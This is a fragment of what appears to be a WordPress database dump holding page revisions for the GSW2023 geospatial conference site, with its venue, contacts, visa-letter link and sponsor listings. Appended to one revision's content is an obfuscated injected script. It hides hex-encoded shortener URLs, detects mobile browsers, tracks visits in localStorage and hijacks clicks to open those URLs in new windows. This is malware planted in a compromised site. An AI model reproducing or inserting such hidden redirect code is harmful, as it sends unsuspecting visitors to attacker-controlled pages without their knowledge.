style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-07-10 01:04:35','2023-07-10 01:04:35','',3066,'https://gsw2023.com/?p=4992',0,'revision','',0),
(4993,1,'2023-07-10 01:05:10','2023-07-10 01:05:10','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688950756889{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><img class=\"alignnone size-full wp-image-4990\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"160\" height=\"190\" /></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a></p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1687571540500{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px 